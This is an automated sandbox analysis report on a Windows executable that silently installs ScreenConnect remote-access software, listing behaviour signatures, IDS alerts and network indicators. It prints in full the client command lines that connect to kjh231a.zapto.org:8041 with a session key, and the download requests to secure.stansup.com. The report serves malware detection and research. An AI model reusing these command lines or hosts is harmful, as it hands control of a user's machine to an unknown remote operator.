Windows Analysis Report
khwHsyfsJ1.exe

Overview

General Information

Sample name: khwHsyfsJ1.exe (renamed because original name is a hash value)
Original sample name: 89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f.exe
Analysis ID: 1542314
MD5: 24686214dadbe686482fb77f11010df4
SHA1: f8c830e878b6f1d5ab63181fec3dbf4fc91f2442
SHA256: 89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f
Tags: exe, secure-stansup-com, user-JAMESWT_MHT

Detection

ScreenConnect Tool
Score: 66
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 20
Range: 0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • khwHsyfsJ1.exe (PID: 652 cmdline: "C:\Users\user\Desktop\khwHsyfsJ1.exe" MD5: 24686214DADBE686482FB77F11010DF4)
    • dfsvc.exe (PID: 1556 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 4844 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1832 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2052 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 2776 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 5656 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000002.00000002.2495260176.000001D4592FB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 1556 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
10.0.ScreenConnect.WindowsClient.exe.a30000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection | Author: Nasreddine Bencherchali (Nextron Systems) | Data: DestinationIp: 192.168.2.9, DestinationIsIpv6: false, DestinationPort: 49707, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 1556, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1832, ProcessName: svchost.exe

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-25T19:27:26.008060+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49723 | TCP
                  2024-10-25T19:27:28.069326+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49724 | TCP
                  2024-10-25T19:27:33.135465+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49729 | TCP
                  2024-10-25T19:27:34.929479+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49730 | TCP
                  2024-10-25T19:27:37.335418+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49731 | TCP
                  2024-10-25T19:27:43.062116+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49732 | TCP
                  2024-10-25T19:27:44.630172+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49733 | TCP
                  2024-10-25T19:27:48.243602+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.9 | 49734 | TCP

                  AV Detection

                  Source: khwHsyfsJ1.exe | ReversingLabs: Detection: 23%
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 85.7% probability
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe | Code function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe

                  Compliance

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Unpacked PE file: 11.2.ScreenConnect.ClientService.exe.5530000.0.unpack
                  Source: khwHsyfsJ1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: khwHsyfsJ1.exe | Static PE information: certificate valid
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49728 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49729 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49733 version: TLS 1.2
                  Source: khwHsyfsJ1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: khwHsyfsJ1.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBFC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829272446.0000000005532000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890524416.0000000002FA0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890789904.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1825684879.0000000000FED000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBF8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829558136.00000000055E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe | Code function: 0_2_00B64A4B FindFirstFileExA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Registry value created: NULL Service
                  Source: global traffic | TCP traffic: 192.168.2.9:49736 -> 79.110.49.185:8041
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1; Host: secure.stansup.com; Accept-Encoding: gzip
                  Source: Joe Sandbox View | IP Address: 79.110.49.185
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49724
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49723
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49730
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49731
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49729
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49733
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49732
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content: 79.110.49.185:443 -> 192.168.2.9:49734
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: secure.stansup.com
                  Source: global traffic | DNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: khwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrust
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000002.00000002.2494183832.000001D4591F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: svchost.exe, 00000008.00000002.2690008650.00000189C641B000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000002.00000002.2491755467.000001D457301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?06f0038
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690157641.00000189C644A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a54a317
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu-1.0
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517366863.00000189C5F5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1
